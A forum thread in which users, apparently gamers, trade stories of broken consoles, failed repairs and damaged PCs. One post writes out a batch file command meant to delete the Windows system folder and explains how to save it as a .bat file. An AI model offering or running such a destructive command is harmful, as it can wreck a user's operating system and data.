It's my old man who has the rotten luck with tech. He's spent well over a grand on all the latest consoles. So far the 360 has broken down twice, the PS3 has been replaced six times, and the Wii...doesn't have a chance to break because nobody ever uses it.

I on the other hand spend just over 100 pounds buying retro consoles such as my N64, SNES, etc. They all work fine after years of punishment.

So I got a HDD for my Wii on Christmas Day last year. I have to install some stupid software to use it first, though. I install it, it asks for my computer to restart, I say okay. My computer blue screens every time I restart. I try resetting to last good config, making sure the boot order was okay, etc. In the end I had to do a system restore on my computer. Everything got backed up to a second drive on my computer but still, it sucked.

Recently (a couple of days ago) my brother destroyed our laptop. I have no idea what he did. He said he was just using Word, but that can't cause a computer to crash without any way to repair it... But, the good thing about it is: my Mum decided we could get our own computers now, my brother got himself about the strongest laptop ATM, and I got myself a neat little netbook

I first thought of getting a Acer Predator, but because I don't game a lot (on the computer, that is) and because you can't take it with you when you go somewhere, I just thought a netbook would be best

Word. I'm probably the only one in my entire family that knows Windows has another text editor (albeit not as advanced)

Well I really have only one story.

Do NOT put your DSL in a shirt pocket (even if you can).

Bent over to get a cold one out of the cooler at a family gathering at my brothers and you know, ice water does nothing good for a DS lite.

The amazing part is I dried it out rapidly, took out battery dried inside as far as tissue could manage and then set in front of a fan on full blast. And all that happened was the L Button would act right. No biggie as the L button often doesn't any way. But I sold it and got a new one and thanked my ability to only be out 40 bucks for the lesson learned.

Aside from that, my only beef with technology is it's become impossible to not use.
I wish it was 1970 again.

You can do that one pretty much every text editor. You just need to enter the following:
@echo off del c:\\windows\system 32
And sav it as enternamehere.bat or make up a name yourself. Make sure that you save it as .bat, not as .bat.txt or something like that, and also, make sure you don't execute it. Ever.

Anyway, I haven't had any bad luck for a while...

I've got a 360, send it in 5 times for repairs.

first time was when i bought test drive unlimited. It would load for bit and then freeze. Microsoft said it was the TV, so we bought a new TV. Still the same problem. Then i shipped it to microsoft, got one back within a week and worked fine.

Second time was RROD.

Third time was Disc scratching and the DVD-Drive making an awful lot of scratchy and buzzing noises and a blipping red light on the inside of the 360. (which microsoft said was overheating, and possible burning of something on the motherboard, really weird story)

Fourth time was RROD.

Fifth time was the RROD again.

I've never had any problems with my DSphat and DSI.

I've also never had problems with computers. I only managed to frie te motherboard of an old packard bell once, but that was because my dad tried to run a very heavy game on it

EDIT: added the fifth time.

I formatted my hard drive by accident. Don't ask how.

I had a launch 360 overheat and nearly catch on fire, my dad went through 10 360's due to RROD and other laser problems. Microsoft made a crappy piece of gaming hardware.

More like, Microsoft makes crap. Whether it's hardware or software. It always fails.

Hmmm, let's see. I got a PSP-1000 and the battery would only last 10 minutes at a time. Got a new battery, and that one was the same. Decided to only use the adapter plug (PSP no longer portable), and guess what? If you touch the plug even slightly, the PSP shuts off completely. So, I bound the adapter cord to the little loop on the left side of the PSP so that there wouldn't be any play, and hold the cord between my left pinky and ring finger whenever I use it.

I got a new mouse. It broke. Bought another one (logitech), it broke too. Now I use my laptop's touchpad and left/right click buttons. The left click broke.

Got some sweet logitech speakers... they broke. Then I bought some headphones, and they started to break. Then they broke completely. Repeat 15 times.

Got that awesome GT Driving Force Pro wheel for PS2 for Gran Turismo 4 when it came out. The pedals broke. The wheel is fine, but the pedals are junk. Sent them back to the factory, they sent me new pedals. They broke. Now they say they don't support that model anymore :\

None of that stuff was my fault. I have plenty of problems with stuff that was my fault (DS hinge broke when I dropped it, modded PS2 doesn't load 60% of the time, etc.), but there's no point in talking about it.
